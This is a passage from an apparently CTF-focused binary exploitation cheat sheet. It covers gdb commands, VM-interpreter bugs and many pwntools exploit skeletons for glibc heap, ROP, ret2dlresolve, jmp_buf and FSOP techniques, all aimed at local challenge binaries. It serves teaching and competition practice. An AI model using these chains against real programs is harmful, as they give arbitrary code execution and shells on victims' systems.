tb *0x401234
info b
c
ni
si
finish
until *0x4012ab

Inspect registers / stack / memory:

i r
x/20gx $rsp
x/40bx $rax
x/s $rdi
telescope $rsp 20
vmmap
info proc mappings

Commonly used for heap challenges:

heap
bins
tcachebins
fastbins
smallbins
largebins
arena
vis_heap_chunks

Find key addresses / key bytes:

piebase
libcbase
search -t dword 0xfbad1800
search -t bytes -x 0f05
search /bin/sh

Commonly used for fork / seccomp / syscall challenges:

set follow-fork-mode child
set detach-on-fork off
catch fork
catch syscall openat
catch syscall read
catch syscall write
handle SIGALRM nostop noprint pass

A very common opening sequence in CTFs:

b *main
r
vmmap
i r
x/20gx $rsp
disas main

VM Pwn

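The core of a VM pwn challenge is not writing the exploit first but getting a clear picture of the VM's real memory model.

Answer these questions first:

What is the bytecode format
How many bytes are the opcode and the operands
Where do the virtual registers, virtual stack, and virtual memory live
Where is the handler table
Can an out-of-bounds access in the guest reach fields of host structures

The most common dispatch loop looks like this: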

movzx eax, byte ptr [rdi+rcx]      ; opcode = code[pc]
inc rcx                            ; pc++
jmp qword ptr [r8+rax*8]           ; handlers[opcode]()

Typical meaning:

rdi points to the bytecode/code buffer
rcx is the pc
r8 is the handler table

If the challenge uses a switch/jump table, you will usually see this pattern:

movzx eax, byte ptr [rbx+rdx]
add rdx, 1
cmp eax, 0x10
ja  default_case
jmp qword ptr [rip+table+rax*8]

A single handler commonly looks like this:

movzx eax, byte ptr [rdi+rcx]      ; dst
inc rcx
movzx edx, byte ptr [rdi+rcx]      ; src
inc rcx
mov r8, qword ptr [r9+rax*8]       ; regs[dst]
add r8, qword ptr [r9+rdx*8]       ; regs[dst] += regs[src]
mov qword ptr [r9+rax*8], r8
jmp dispatch

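The bugs you really need to watch for:

An unchecked index used directly as regs[idx] or mem[idx]
Signed/unsigned confusion, so a negative index goes straight out of bounds
Inconsistent read/write widths, mixing byte/word/dword/qword
A double fetch between opcode decoding and execution
Overlapping bytecode and data regions, which allows self-modification
RWX JIT pages

The typical assembly signature of a negative index / signed out-of-bounds access:

movsxd rax, dword ptr [rdi+rcx]    ; idx is sign-extended
add rcx, 4
mov rdx, qword ptr [r8+rax*8]      ; idx < 0 reads before the start of the array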
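To pick the operand bytes for a negative index, it helps to model the sign extension on the Python side. The sketch below mirrors the `movsxd` plus `[base + idx*8]` pattern above with `struct`; `signed_index_offset` is a hypothetical helper, and the 8-byte element size is taken from the `rax*8` scaling.

```python
import struct

def signed_index_offset(raw, elem_size=8):
    """Byte offset from the array base after a signed 32-bit index is scaled by elem_size."""
    (idx,) = struct.unpack("<i", raw[:4])   # signed little-endian dword, as movsxd reads it
    return idx * elem_size

# Operand bytes f8 ff ff ff decode to idx = -8, i.e. 0x40 bytes before element 0
print(signed_index_offset(bytes.fromhex("f8ffffff")))   # -64
```

Going the other way, `struct.pack("<i", -8)` yields the four operand bytes to embed in the bytecode.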

Typical signature of a width mismatch:

mov eax, dword ptr [rdi+rcx]       ; only 32 bits are fetched
add rcx, 4
lea rdx, [r8+rax*8]                ; later used as a 64-bit index
mov qword ptr [rdx], r9

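The most common exploitation routes for these challenges:

First use an OOB read to leak the VM struct, heap, PIE, and libc
Then use an OOB write to modify the handler table, function pointers, code ptr, or return address
If guest memory is mapped onto the host heap, treat it directly as an arbitrary read/write primitive
For a JIT VM, look for RWX pages first and write shellcode directly

Debugging priorities for VM pwn:

Log pc/sp/regs after every executed opcode
Copy out the opcode-to-handler mapping table first
Check the relative offsets of vm->regs, vm->mem, and vm->code within the struct
Check whether the host-side vm struct lives on the stack or on the heap
For menu-style challenges, check for UAF when the VM is reset / destroyed

A very common struct looks roughly like this: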

struct VM {
    uint8_t *code;
    uint64_t pc;
    uint64_t regs[8];
    uint8_t mem[0x100];
    void (*handlers[0x20])(struct VM *);
};

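With this layout, once regs[idx] or mem[idx] goes out of bounds, the first targets worth looking at are:

code
pc
handlers
heap-management fields before and after the VM object

If you write your own bytecode helper, start from a minimal skeleton like this: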

from pwn import *

def op(opcode, *args):
    return p8(opcode) + b''.join(p8(x & 0xff) for x in args)

code = b''
code += op(0x01, 0x00, 0x01)   # add r0, r1
code += op(0x02, 0xff, 0x00)   # deliberately craft an abnormal idx
code += op(0x09)               # exit / halt

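Then extend it step by step with:

mov_imm
load
store
add/sub/xor/shl/shr
jmp/jnz
putc/print

VM Pwn reminders:

Recover the interpreter semantics first, then think about exploitation
Work out how the guest bug maps to a host primitive first, then think about control flow
Many VM challenges look like reversing challenges but are really heap, stack, or function-pointer challenges
If the interpreter is written in C++, remember to check the vtable as well

Minimal helper demo: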

from pwn import *

def op(opcode, *args):
    out = p8(opcode)
    for x in args:
        if -0x80 <= x <= 0xff:
            out += p8(x & 0xff)
        else:
            out += p32(x & 0xffffffff)
    return out

def mov_imm(dst, imm):
    return p8(0x10) + p8(dst & 0xff) + p64(imm & 0xffffffffffffffff)

def load(dst, idx):
    return op(0x20, dst, idx)

def store(idx, src):
    return op(0x21, idx, src)

def put(reg):
    return op(0x30, reg)

def halt():
    return op(0xff)

# Leak first, write later
NEG_IDX = -8
code = b''
code += mov_imm(0, NEG_IDX & 0xffffffffffffffff)
code += load(1, 0)      # leak data adjacent to the vm struct
code += put(1)
code += halt()

# p.send(code)

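Tricks collected from competitions

The heap has no direct leak interface and the allocation size is capped very small; how do you make the challenge leakable first? (requires UAF)

Free two fastbin chunks, then modify the fd of one freed chunk so that a later allocation lands in the data area of the other chunk. Forge a small fake chunk in that data area first, then malloc twice to get it back and create overlapping chunks. Editing through the overlap raises the size into the unsorted-bin range, after which you can go on to a libc leak, pivot to stdout, or continue with other heap feng shui.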

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process('./pwn')

def add(size, idx, data=b'aaaa'):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendafter(b'data: ', data)

def edit(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendafter(b'data: ', data)

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())

add(0x28, 0, b'aaaa')  # 0
add(0x28, 1, b'aaaa')  # 1
add(0x50, 2, b'aaaa')  # 2
add(0x60, 3, b'aaaa')  # 3

delete(0)
delete(1)

# Point the fd of freed chunk 1 back into chunk 0's data area (partial overwrite of the low byte)
edit(1, b'\x20')

# Forge a fake chunk inside chunk 0's data area first
edit(0, p64(0) * 3 + p64(0x31))

# malloc twice to get the fake chunk back
add(0x28, 0, b'aaaa')
add(0x28, 1, b'aaaa')

# Edit through the fake chunk to raise the original chunk 1's size into the unsorted range
edit(1, p64(0) + p64(0x91))
delete(0)

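Only small allocations are allowed and `tcache` is full or even disabled; how do you get from `fastbin` to an unsorted-bin leak?

This kind of challenge brings to mind Setjmp from HITCON CTF 2024 Quals and old school from snakeCTF 2025 Quals. The point is not to struggle with forging a large chunk but to fill the tcache bin of that size first and then trigger malloc_consolidate() with one large input, so the fastbin chunks really flow into the unsorted bin. As long as a UAF, a printing side effect, or an overlap follows, libc leaks out.

If the challenge also performs checks such as malloc_usable_size, here is a slightly dated but handy point: set the IS_MMAPPED bit to 1 when forging the chunk header, and many check paths become more lenient.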

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

def add(i, size, data=b'A'):
    ...

def delete(i):
    ...

# Lay out a batch of small chunks of the same size first
for i in range(12):
    add(i, 0x28, b'A' * 8)

# The first 7 go into tcache, the rest start going into fastbin
for i in range(12):
    delete(i)

# One large input here forces glibc to consolidate the fastbins
big = b'0' * 0x500
p.sendlineafter(b'> ', big)

# If the program later prints/walks these chunks,
# there is a chance to read the unsorted fd/bk (main_arena) directly
# leak = u64(recv(...)[:8])
# libc.address = leak - main_arena_off

# For a fake header that is easier to get past the checks, remember this bit:
fake_size = 0x91 | 2          # 2 == IS_MMAPPED
print(hex(fake_size))

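With only UAF / double free and safe-linking still enabled, how do you point `next` at a target address?

Get a heap leak first, then compute the protected pointer as protected = ptr ^ (pos >> 12). The part most often gotten wrong is pos: it is neither the target address nor the chunk base, but the address of the location where this next pointer is stored. When answering this kind of question, spell out both steps together: leak the heap first, then poison.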

from pwn import *

context.binary = elf = ELF('./pwn')

def protect_ptr(pos, ptr):
    return ptr ^ (pos >> 12)

heap_chunk = 0x55555555a290
target = elf.got['free']

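# The next pointer normally sits at the start of the freed chunk's data
poisoned = protect_ptr(heap_chunk + 0x10, target)

# edit(victim_idx, p64(poisoned))
# After victim itself has been handed out, the following malloc(size) can return target
# (glibc 2.32+ also requires target to be 16-byte aligned)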
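The "leak heap first" step often comes from reading a protected `next` pointer back through the UAF. Two cases are worth having ready: a NULL `next` (the value read is simply `pos >> 12`), and a `next` that points into the same 4 KiB page as its storage location, which can be unwound 12 bits at a time. The sketch below is plain Python with hypothetical helper names, and it assumes 48-bit user addresses.

```python
def heap_page_from_null_next(protected):
    """A NULL next is stored as pos >> 12, so shifting back gives the page base of pos."""
    return protected << 12

def reveal_same_page(protected):
    """Recover ptr from ptr ^ (pos >> 12) when ptr and pos share all bits above bit 11."""
    ptr = protected
    for _ in range(4):                  # each round fixes 12 more bits, top down
        ptr = protected ^ (ptr >> 12)
    return ptr

pos = 0x55555555a2a0                    # where the next pointer is stored (example value)
nxt = 0x55555555a2d0                    # pointer in the same page (example value)
print(hex(reveal_same_page(nxt ^ (pos >> 12))))
```

If the two chunks straddle a page boundary, the recovered value is off in the bits that differ, so cross-check against the expected chunk spacing.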

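With OOB access to `tcache_perthread_struct`, how do you turn it into arbitrary allocation?

The first thing to think of here is not "can I leak a bit more" but "can I make the next malloc return the target address directly". counts[idx] decides how many more chunks this bin can hand out, and entries[idx] decides where the next malloc(size) is taken from. Point entries at the stack, .bss, a global function-pointer table, or next to some other key structure, and the next malloc hands out a chunk right there.

This kind of challenge feels a lot like heap01 from SunshineCTF 2024 and corchatv3 from corCTF 2024.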

from pwn import *

context.binary = elf = ELF('./pwn')
p = process(elf.path)

heap_base = 0x55555555a000
tcache_struct = heap_base + 0x10
stack_leak = 0x7fffffffdc00

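# Using the bin for 0x20 chunks as an example
bin_idx = 0
# glibc 2.30+ layout: uint16_t counts[64] (0x80 bytes), then entries[64];
# before 2.30 counts were 1 byte each and entries started at +0x40
count_addr = tcache_struct + bin_idx * 2
entry_addr = tcache_struct + 0x80 + bin_idx * 8

# Goal: make the next malloc(0x18) return a location on the stack
# (kept 16-byte aligned, which glibc 2.32+ checks on tcache chunks)
target = (stack_leak - 0x18) & ~0xf

# In a real challenge these two addresses are usually modified through OOB/UAF first
print('count_addr =', hex(count_addr))
print('entry_addr =', hex(entry_addr))
print('target     =', hex(target))

# write(count_addr, p16(1))
# write(entry_addr, p64(target))
# malloc(0x18) -> returns target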
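The index arithmetic above can be wrapped in a small helper so that other sizes do not have to be worked out by hand. This is a sketch for x86-64 and for glibc versions where the struct is `counts[64]` followed by `entries[64]`; the helper name `tcache_slots` and its `counts_are_u16` switch are hypothetical.

```python
def tcache_slots(chunk_size, heap_base, counts_are_u16=True):
    """Return (idx, count_addr, entry_addr) inside tcache_perthread_struct for a chunk size."""
    idx = (chunk_size - 0x20) // 0x10          # 0x20 -> 0, 0x30 -> 1, ...
    if not 0 <= idx < 64:
        raise ValueError("size is outside the tcache range")
    struct_base = heap_base + 0x10             # user area of the first heap chunk
    count_size = 2 if counts_are_u16 else 1    # uint16_t since glibc 2.30, 1 byte before
    count_addr = struct_base + idx * count_size
    entry_addr = struct_base + 64 * count_size + idx * 8
    return idx, count_addr, entry_addr

idx, count_addr, entry_addr = tcache_slots(0x20, 0x55555555a000)
print(idx, hex(count_addr), hex(entry_addr))
```

Note that `chunk_size` is the size including the header, so a `malloc(0x18)` request corresponds to `0x20`.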

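You can already reach a `smallbin`; how do you borrow `tcache stashing unlink` for one targeted write?

Its essence is not "getting one more bin" but "borrowing the malloc path to perform one targeted write". When the tcache for some size is not full while the smallbin already holds chunks of the same size, glibc moves chunks from the smallbin into the tcache as a side effect of the allocation. If you set bk to something like target - 0x10 beforehand, you get to borrow the write performed during unlink.

What really needs remembering is how the route chains together: smallbin, tcache not full, stash during malloc, bk pointed near the target.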

from pwn import *

context.binary = elf = ELF('./pwn')

target = elf.got['puts']
fake_bk = target - 0x10

# Pseudocode outline:
# 1. Free up room in the tcache for some size
# 2. Get chunks of the same size into the smallbin
# 3. Use UAF/overflow to set victim->bk = fake_bk
# 4. malloc the same size to trigger the write inside the stashing / unlink path

print('target  =', hex(target))
print('fake_bk =', hex(fake_bk))

# edit(victim, b'A' * off + p64(fake_bk))
# add(size, ...)

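No direct output interface, but you can already reach the area around `stdout`; how do you move on to libc and then the stack?

First land an allocation at a common offset such as stdout - 0x43 and turn stdout into a leak channel. If you already know libc, go one step further and point fields such as _IO_write_base/_ptr at environ, so the second hop turns a libc leak into a stack leak, after which you can overwrite a return address and do stack ROP.

This chain is no longer just an "old challenge template": many heap challenges in recent years treat stdout -> environ -> stack as a standard relay, because old routes such as __free_hook are no longer dependable.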

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

stdout = libc.sym['_IO_2_1_stdout_']
environ = libc.sym['environ']
target = stdout - 0x43

# Step 1: land a chunk at stdout-0x43 first
# tcache/fastbin poisoning -> malloc() returns target

payload = b'a' * 0x33
payload += flat(
    0xfbad1800,        # _flags
    environ,           # _IO_read_ptr
    environ,           # _IO_read_end
    environ,           # _IO_read_base
    environ,           # _IO_write_base
    environ + 8,       # _IO_write_ptr
    environ + 8,       # _IO_write_end
    environ + 8,       # _IO_buf_base
    environ + 8,       # _IO_buf_end
)

# edit(idx, payload)
# stack = u64(p.recv(8).ljust(8, b'\x00'))

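`glibc 2.34+` has no hooks and there is no direct leak interface; where do you usually finish?

The more dependable route is usually not to quote some fixed offset but to go "stdout -> environ -> stack first, then overwrite the saved RIP for stack ROP". If the program's exit path is easier to attack, exit handlers or _rtld_global are also worth considering.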

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

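# Assumed known: libc.address and stack_leak (the placeholders below come from your leaks)
libc.address = 0x7ffff7dc0000
stack_leak = 0x7fffffffdc00
saved_rip = stack_leak - 0x120   # adjust the offset per challenge
rop = ROP([elf, libc])

rop.raw(rop.find_gadget(['ret'])[0])
rop.system(next(libc.search(b'/bin/sh\x00')))

# With an arbitrary write, place rop.chain() directly at saved_rip
# write(saved_rip, rop.chain())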

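Only one function-pointer hijack and no wish to gamble on `one_gadget`; how do you launch a ROP chain on the heap?

Many challenges on newer libc versions end up going through setcontext. Do not memorize +61/+53 blindly: disas setcontext first, confirm which register it takes the frame from, then see from which offsets rsp and the final rip are loaded. Then lay a fake ucontext and the second-stage ROP chain on the heap, and finally jump in through one function pointer, vtable, exit handler, or FILE path.

If seccomp is in place, write the second stage as openat -> read -> write; without seccomp, plain system / execve works too.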

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
rop = ROP([elf, libc])

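heap_frame = 0x404800          # placeholder address of the fake frame
heap_rop = heap_frame + 0x200
flag = heap_frame + 0x400
AT_FDCWD = -100 & 0xffffffffffffffff   # pass -100 as an unsigned 64-bit value

rop.raw(rop.find_gadget(['ret'])[0])
rop.call(libc.sym['openat'], [AT_FDCWD, flag, 0, 0])
rop.call(libc.sym['read'], [3, flag, 0x100])    # assumes the newly opened fd is 3
rop.call(libc.sym['write'], [1, flag, 0x100])

# In common versions rsp is loaded from frame+0xa0 and the new rip from nearby.
# Always confirm the exact offsets with a local disas setcontext.
frame = flat({
    0xa0: heap_rop,
    0xa8: rop.find_gadget(['ret'])[0],
}, filler=b'\x00')

# Pad so the chain starts at +0x200 and the path string at +0x400, matching heap_rop and flag
payload = (frame.ljust(0x200, b'\x00') + rop.chain()).ljust(0x400, b'\x00') + b'/flag\x00'
setcontext_pivot = libc.sym['setcontext'] + 61   # version-specific; verify with disas

# write(fake_chunk, payload)
# overwrite(call_target, p64(setcontext_pivot))
# Before triggering, confirm the call site passes the fake_chunk address in the register setcontext expects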

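Only one input point and not enough gadgets; how do you get a second input for free and then pivot the stack?

Do not rush to hand-build read(0, bss, size). If the program already contains a code path that sets up arguments and then calls fgets/read, the more dependable move is to return into that logic and set the saved rbp to a spot near your chosen fake stack. The second input is then written automatically to something like rbp-0x20, and when the function epilogue runs leave; ret, the stack migrates by itself.

If the second stage leads into ret2dlresolve, do not place the fake stack at the bottom of a writable page. The dynamic linker does extra push/sub while resolving symbols, and being too close to a read-only page easily crashes on rsp.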

from pwn import *

context.binary = elf = ELF('./pwn')
p = process(elf.path)

off = 0x28
fake_stack = elf.bss(0x800)
fgets_again = elf.sym['main'] + 0x87   # change to the "set up arguments + call fgets/read" location in your binary
leave_ret = 0x4011bd

payload1 = flat(
    b'A' * off,
    fake_stack + 0x20,   # saved rbp
    fgets_again,         # return into the "set up arguments + read again" path
)
p.sendline(payload1)

stage2 = flat(
    fake_stack + 0x400,  # next rbp
    leave_ret,           # the pivot completes when the original epilogue runs leave; ret
    b'B' * 0x100,
)
p.sendline(stage2)

# If stage2 is going to lead into ret2dlresolve:
# 1. Place the fake stack reasonably high in the writable region
# 2. Leave room for the extra push/sub done by ld.so

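How do you chain a combo challenge like `Full RELRO + Canary + PIE + fmtstr + stack overflow`?

The usual answer is not some magic gadget but "the format string leaks, the stack overflow finishes". Use the format string to leak canary, PIE, and libc in one go, return to main, and run a normal ROP chain on the second input. This chain shows up very frequently in CTFs everywhere.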

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

fmt = b'%15$p.%17$p.%19$p'
p.sendline(fmt)
leaks = p.recvline().strip().split(b'.')

canary = int(leaks[0], 16)
pie_leak = int(leaks[1], 16)
libc_leak = int(leaks[2], 16)

elf.address = pie_leak - 0x1234
libc.address = libc_leak - 0x2724a

rop = ROP([elf, libc])
off = 0x88
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

payload = flat(
    b'A' * off,
    canary,
    b'B' * 8,
    ret,
    pop_rdi,
    next(libc.search(b'/bin/sh\x00')),
    libc.sym['system'],
)
p.sendline(payload)

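`execve` is banned by seccomp and so is `open`, but `openat` is still available; how do you finish?

Stop fixating on system("/bin/sh"). The more dependable route is openat -> read -> write, or a shorter chain via sendfile if it is allowed. In many challenges the key insight is simply "when open is unavailable, check openat first". If the stack is too small, pivot to .bss / heap first and run the second stage there.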

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

asm_code = shellcraft.openat(-100, '/flag', 0, 0)
asm_code += shellcraft.read('rax', 'rsp', 0x100)
asm_code += shellcraft.write(1, 'rsp', 0x100)

shellcode = asm(asm_code)
print(disasm(shellcode))

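No libc leak, but you have one controllable `read` and basic ROP; how do you use `ret2dlresolve` to supply the missing symbol?

Think of ret2dlresolve first. The key is not memorizing a template but knowing when to borrow the dynamic resolver to produce system/execve. The core: drop forged structures into .bss and let the dynamic linker resolve the symbol for you.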

from pwn import *

context.binary = elf = ELF('./pwn')
p = process(elf.path)
rop = ROP(elf)

off = 0x88
bss = elf.bss(0x800)
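dl = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'], data_addr=bss)

rop.read(0, dl.data_addr, len(dl.payload))   # stage 1: read the forged structures into .bss
rop.ret2dlresolve(dl)                        # stage 2: enter the resolver with the forged reloc index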

payload = flat(
    b'A' * off,
    rop.chain(),
)
p.sendline(payload)
p.send(dl.payload)
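For reference, this is roughly what the forged structures look like on amd64 when built by hand. It is a simplified sketch with made-up addresses, not what pwntools emits byte for byte; the helper names are hypothetical, and the struct layouts are the standard `Elf64_Rela` and `Elf64_Sym`.

```python
import struct

R_X86_64_JUMP_SLOT = 7
ENTRY_SIZE = 24  # sizeof(Elf64_Rela) == sizeof(Elf64_Sym) == 24

def elf64_rela(r_offset, sym_index):
    """Pack an Elf64_Rela: r_offset, r_info, r_addend."""
    r_info = (sym_index << 32) | R_X86_64_JUMP_SLOT
    return struct.pack('<QQq', r_offset, r_info, 0)

def elf64_sym(st_name):
    """Pack an Elf64_Sym with only st_name and st_info set."""
    st_info = 0x12  # STB_GLOBAL << 4 | STT_FUNC
    return struct.pack('<IBBHQQ', st_name, st_info, 0, 0, 0, 0)

def indices(fake_rela, fake_sym, fake_str, jmprel, symtab, strtab):
    """Compute the values the resolver uses to locate the forged entries."""
    assert (fake_rela - jmprel) % ENTRY_SIZE == 0
    assert (fake_sym - symtab) % ENTRY_SIZE == 0
    return {
        'reloc_index': (fake_rela - jmprel) // ENTRY_SIZE,
        'sym_index': (fake_sym - symtab) // ENTRY_SIZE,
        'st_name': fake_str - strtab,
    }

# Made-up section addresses and .bss slots, chosen so the divisions are exact.
idx = indices(fake_rela=0x404830, fake_sym=0x404810, fake_str=0x404850,
              jmprel=0x4005B8, symtab=0x4003D0, strtab=0x400490)
rela = elf64_rela(r_offset=0x404900, sym_index=idx['sym_index'])
sym = elf64_sym(idx['st_name'])
print(idx, len(rela), len(sym))
```

On amd64 the symbol index is also used to index the version table, which is one reason hand-rolled payloads crash more often than the pwntools one; treat this as a mental model rather than a drop-in payload.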

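The program uses `setjmp/longjmp/jmp_buf`: which direction should you think in?

Don't treat this as ordinary flow control only; a jmp_buf is effectively another control-flow object. In challenges from the last couple of years, jmp_buf/setjmp/longjmp often stands in for the classic return-address overwrite. A jmp_buf stores a register snapshot, with rsp/rip (and rbp on x86_64 glibc) usually pointer-mangled; if you can overwrite it, all that is left is waiting for a longjmp to fire.

On x86_64 glibc, the usual pointer mangling relation can be remembered as: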

from pwn import *

def rol(x, n):
    return ((x << n) | (x >> (64 - n))) & ((1 << 64) - 1)

def ror(x, n):
    return ((x >> n) | (x << (64 - n))) & ((1 << 64) - 1)

def ptr_mangle(ptr, guard):
    return rol(ptr ^ guard, 0x11)

def ptr_demangle(val, guard):
    return ror(val, 0x11) ^ guard
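One practical consequence of this relation: if you can leak a single mangled value whose plain pointer you already know, the guard falls out directly. A self-contained sketch (it repeats the helpers so it runs on its own; `recover_guard` and the sample values are made up for illustration):

```python
MASK64 = (1 << 64) - 1

def rol(x, n):
    return ((x << n) | (x >> (64 - n))) & MASK64

def ror(x, n):
    return ((x >> n) | (x << (64 - n))) & MASK64

def ptr_mangle(ptr, guard):
    return rol(ptr ^ guard, 0x11)

def ptr_demangle(val, guard):
    return ror(val, 0x11) ^ guard

def recover_guard(mangled, known_ptr):
    """Given a mangled value and the plain pointer it encodes, return the guard."""
    return ror(mangled, 0x11) ^ known_ptr

# Made-up values: pretend we leaked the mangled form of a known code address.
guard = 0xDEADBEEFCAFEBABE
known_ptr = 0x401196
leaked = ptr_mangle(known_ptr, guard)

recovered = recover_guard(leaked, known_ptr)
print(hex(recovered))
```

Typical known pointers are the saved pc inside a jmp_buf (the return address of the setjmp call) or a registered exit handler, assuming you have a leak of the mangled slot.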

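If the challenge really wants you to attack jmp_buf, the usual skeleton is:

from pwn import *

context.binary = elf = ELF('./pwn')

guard = 0xdeadbeefcafebabe   # placeholder: leak pointer_guard first
fake_rsp = 0x404800
target_rip = elf.sym['win']

# Reuses ptr_mangle() from the helper block above.
# Assumed x86_64 glibc slot order: rbx, rbp, r12, r13, r14, r15, rsp, pc
# (rbp, rsp and pc are stored mangled); adjust to your version and structure.
jmp_buf = flat(
    0,                               # rbx
    ptr_mangle(fake_rsp, guard),     # rbp
    0, 0, 0, 0,                      # r12-r15
    ptr_mangle(fake_rsp, guard),     # rsp
    ptr_mangle(target_rip, guard),   # pc
)

# write(saved_env, jmp_buf)
# then trigger longjmp(saved_env, 1)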

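The program calls `fork`: can addresses leaked in the child be used directly against the parent?

If it is fork() and not execve(), the answer is usually yes. A freshly forked child's address space is a copy of the parent's, so libc, stack, canary, and PIE base normally all match. Quite a few recent challenges deliberately split the leak and the real exploit across parent and child, so don't throw away the addresses the child gave you.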

from pwn import *

# Pseudocode outline:
# 1. Have the child leak canary / libc / stack for you
# 2. Read those leaks back
# 3. Reuse the same addresses in the exploit against the parent

io = process('./pwn')

# child phase: collect the leaks
io.sendline(b'LEAK')
canary = u64(io.recvn(8))
libc_leak = u64(io.recvn(8))
stack_leak = u64(io.recvn(8))

# parent phase: reuse these addresses as-is
payload = flat(
    b'A' * 0x88,
    canary,
    b'B' * 8,
    stack_leak,
)
io.sendline(payload)
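A related consequence of "the canary is the same in every forked child": when there is no direct leak, a forking server can sometimes be used as a crash oracle to recover the canary byte by byte. The sketch below runs against a simulated oracle, not a real target; `brute_canary` and the oracle are hypothetical, and a real oracle would send an overflow and report whether the child survived.

```python
import os

def brute_canary(survives, size=8):
    """Recover a canary one byte at a time.

    `survives(prefix)` must return True when a child whose canary was
    overwritten with `prefix` (a partial overwrite) does not abort.
    """
    known = b'\x00'                      # on Linux/glibc the lowest canary byte is 0
    while len(known) < size:
        for guess in range(256):
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError('no byte survived; the oracle is unreliable')
    return known

# Simulated forking target: every "child" shares the parent's canary.
secret = b'\x00' + os.urandom(7)
oracle = lambda prefix: secret.startswith(prefix)

recovered = brute_canary(oracle)
print(recovered.hex())
```

At most 7 * 256 attempts are needed in this model; it stops working as soon as the service re-executes itself instead of only forking.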

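When you can reach `IO_FILE`, how do you use `FSOP` as a leak or control-flow primitive?

Start by splitting IO_FILE attacks into three classes:

Leak only: prefer stdout/stderr; in essence you edit _flags and the read/write pointers so that libc prints the addresses for you
Stable control flow: prefer "legitimate main vtable + tampered wide-character side chain"
Version-specific houses: only then look at House of Apple / House of Pig / _IO_str_jumps / _IO_obstack_jumps / __printf_buffer_as_file_jumps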
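For the leak-only case, the well-known stdout partial overwrite can be sketched as follows. This assumes you can write a short prefix over the start of `_IO_2_1_stdout_`; the helper name is made up, and the flag values are the glibc `_IO_*` constants as I understand them, so confirm against your libc.

```python
import struct

_IO_MAGIC = 0xFBAD0000
_IO_CURRENTLY_PUTTING = 0x0800
_IO_IS_APPENDING = 0x1000

def stdout_leak_prefix(low_byte=0x00):
    """Bytes to write over the start of stdout's FILE for a partial-overwrite leak.

    Fields written: _flags, _IO_read_ptr, _IO_read_end, _IO_read_base,
    then only the lowest byte of _IO_write_base.
    """
    flags = _IO_MAGIC | _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING
    return struct.pack('<QQQQ', flags, 0, 0, 0) + bytes([low_byte])

payload = stdout_leak_prefix()
print(payload.hex())
```

Lowering `_IO_write_base` below `_IO_write_ptr` makes the next output call flush the bytes in between, which typically include libc pointers.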

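For a pure leak, the most common route is still the stdout -> environ -> stack chain described earlier. What deserves its own entry is the wide-character chain on modern glibc: the main vtable is now strictly validated, so many challenges detour through _wide_data instead.

On modern glibc, a very common control-flow path is: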

exit()
 -> __run_exit_handlers
  -> _IO_cleanup
   -> _IO_flush_all
    -> if (fp->_mode > 0 &&
           fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
         _IO_OVERFLOW(fp, EOF)
          -> _IO_wfile_overflow
           -> if (wide_write_base == NULL)
                _IO_wdoallocbuf
                 -> _IO_WDOALLOCATE(fp)
                  -> fp->_wide_data->_wide_vtable->__doallocate(fp)

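The key points of this chain:

The diagram above shows the wide-character side chain; in practice another common entry is the ordinary dirty-write branch, _mode <= 0 && _IO_write_ptr > _IO_write_base, which is what Apple2/Apple3 setups often look like
Trigger via exit() or a normal return from main where possible; _exit(), abort(), and fatal signals do not necessarily go through this path
Don't forge the main vtable arbitrarily; it usually has to be the legitimate &_IO_wfile_jumps inside glibc
For _IO_flush_all to keep going, the usual condition is fp->_mode > 0 with the wide write_ptr > write_base
What you actually hijack is not the main vtable but fp->_wide_data->_wide_vtable
To get through _IO_wfile_overflow -> _IO_WDOALLOCATE, besides write_ptr > write_base you usually also need the corresponding buf_base == NULL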
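The conditions above can be written as two small predicates. This is a simplified model of the checks as I read them in the glibc source, not a copy of it; the function names are made up, and version-specific details (locking, `_IO_vtable_offset`) are left out.

```python
_IO_UNBUFFERED = 0x2
_IO_NO_WRITES = 0x8
_IO_CURRENTLY_PUTTING = 0x800

def flush_all_calls_overflow(mode, write_base, write_ptr,
                             wide_write_base=0, wide_write_ptr=0):
    """Model the per-FILE check in _IO_flush_all that leads to _IO_OVERFLOW."""
    narrow_dirty = mode <= 0 and write_ptr > write_base
    wide_dirty = mode > 0 and wide_write_ptr > wide_write_base
    return narrow_dirty or wide_dirty

def wfile_overflow_reaches_doallocate(flags, wide_write_base, wide_buf_base):
    """Model the checks between _IO_wfile_overflow and _IO_WDOALLOCATE."""
    if flags & _IO_NO_WRITES:
        return False                  # overflow bails out early
    if flags & _IO_CURRENTLY_PUTTING:
        return False                  # skips the allocation branch
    if wide_write_base != 0:
        return False                  # buffer already looks set up
    if wide_buf_base != 0:
        return False                  # _IO_wdoallocbuf returns immediately
    return not (flags & _IO_UNBUFFERED)

# The field values used by the wide-chain layout: _mode = 1,
# wide write_base = 0, wide write_ptr = 1, everything else zero.
print(flush_all_calls_overflow(1, 0, 0, 0, 1),
      wfile_overflow_reaches_doallocate(0, 0, 0))
```

Running a planned layout through predicates like these before touching the target catches most "crashed before the hijack point" mistakes.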

Common offsets on x86_64 glibc 2.39:

FILE + 0xa0: _wide_data
FILE + 0xc0: _mode
FILE + 0xd8: main vtable
wide_data + 0x18: _IO_write_base
wide_data + 0x20: _IO_write_ptr
wide_data + 0xe0: _wide_vtable
wide_vtable + 0x68: __doallocate

A minimal skeleton that is closer to modern glibc looks like this:

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')

fake_file = 0x404900
fake_wide = 0x404b00
fake_wide_vtable = 0x404c00
fake_lock = 0x404d00
target = elf.sym.get('win', 0x4011d6)

